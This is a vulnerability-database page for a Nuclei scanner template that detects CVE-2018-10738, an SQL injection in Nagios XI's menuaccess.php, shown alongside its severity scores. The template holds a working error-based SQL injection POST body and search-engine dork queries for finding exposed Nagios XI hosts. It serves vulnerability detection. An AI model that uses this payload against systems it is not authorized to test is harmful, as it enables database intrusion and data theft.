Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-10738
HistoryApr 02, 2024 - 4:27 a.m.

NagiosXI <= 5.4.12 menuaccess.php - SQL injection

2024-04-0204:27:43
ProjectDiscovery
github.com
12
nagiosxi
sqlinjection
cve
highseverity
menuaccessphp

CVSS2

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

CVSS3

7.2

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

AI Score

7.6

Confidence

High

EPSS

0.037

Percentile

91.8%

A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/menuaccess.php chbKey1 parameter.
id: CVE-2018-10738

info:
  name: NagiosXI <= 5.4.12 menuaccess.php - SQL injection
  author: DhiyaneshDk
  severity: high
  description: |
    A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/menuaccess.php chbKey1 parameter.
  reference:
    - https://qkl.seebug.org/vuldb/ssvid-97268
    - https://vuldb.com/de/?id.117807
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2018-10738
    cwe-id: CWE-89
    epss-score: 0.01861
    epss-percentile: 0.88359
    cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: nagios
    product: nagios_xi
    shodan-query: http.title:"nagios xi"
    fofa-query:
      - app="Nagios-XI"
      - title="nagios xi"
      - app="nagios-xi"
    google-query: intitle:"nagios xi"
  tags: cve,cve2018,nagios,sqli
variables:
  num: "{{rand_int(2000000000, 2100000000)}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/nagiosql/admin/menuaccess.php"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "selSubMenu=1&subSave=1&chbKey1=-1%' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#"

    matchers:
      - type: word
        part: body
        words:
          - "{{md5(num)}}"
# digest: 4a0a0047304502202002a30ee0c0f4bf08b704df011b9339a525693d56454bb8c48535b88d18d9fd02210098c5aabbadb83cf8d1e0536b1ee7278a177447ef3a5a8e61f6162cc2c9d05062:922c64590222798bb761d5b6d8e72950

CVSS2

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

CVSS3

7.2

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

AI Score

7.6

Confidence

High

EPSS

0.037

Percentile

91.8%

Related for NUCLEI:CVE-2018-10738